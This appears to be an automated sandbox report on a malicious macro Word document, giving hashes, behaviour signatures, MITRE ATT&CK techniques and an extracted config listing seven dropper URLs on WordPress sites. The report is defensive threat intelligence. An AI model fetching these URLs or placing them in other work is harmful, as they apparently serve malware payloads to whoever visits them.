Overview

overview

10

Static

static

8

65e3d81e91...18.doc

windows7-x64

10

65e3d81e91...18.doc

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    65e3d81e912145deaf34eefd2537fdc7_JaffaCakes118

  • Size

    164KB

  • Sample

    240522-eaay2aah88

  • MD5

    65e3d81e912145deaf34eefd2537fdc7

  • SHA1

    dcedd68b5a21efb1a999fe4ffc35385909528803

  • SHA256

    617f019d01c1d776d1c27243f6786c2c0cfa84182b5f0db4599ad12646ce3dfc

  • SHA512

    9d18a7716b3cccd5b4e091e553405e6797a76e2530415d333e1c4d1cae7b4a3fe18ac9c89656d4ecadab0f154408faf53090b2fe9cfe93a3c828738c16ca8a95

  • SSDEEP

    1536:VAhXAhordi1Ir77zOH98Wj2gpngN+a94ay9y0J6f264NBM:mrfrzOH98ipg4PJ6fQBM

Score
10/10
macro

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.yusukelife.com/wp/ure/
exe.dropper

https://www.ingyouth.com/wp-includes/0zCW/
exe.dropper

http://alphapharma247.com/wp-content/plugins/r/
exe.dropper

http://muanha24h.com/wp-content/fHS7/
exe.dropper

http://buyhacks.net/wp-content/jgLqdhk/
exe.dropper

https://comsotaque.com/wp-includes/5i/
exe.dropper

https://qualitychildcarepreschool.com/emqblk/Ik2D/

Targets

    • Target

      65e3d81e912145deaf34eefd2537fdc7_JaffaCakes118

    • Size

      164KB

    • MD5

      65e3d81e912145deaf34eefd2537fdc7

    • SHA1

      dcedd68b5a21efb1a999fe4ffc35385909528803

    • SHA256

      617f019d01c1d776d1c27243f6786c2c0cfa84182b5f0db4599ad12646ce3dfc

    • SHA512

      9d18a7716b3cccd5b4e091e553405e6797a76e2530415d333e1c4d1cae7b4a3fe18ac9c89656d4ecadab0f154408faf53090b2fe9cfe93a3c828738c16ca8a95

    • SSDEEP

      1536:VAhXAhordi1Ir77zOH98Wj2gpngN+a94ay9y0J6f264NBM:mrfrzOH98ipg4PJ6fQBM

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Tasks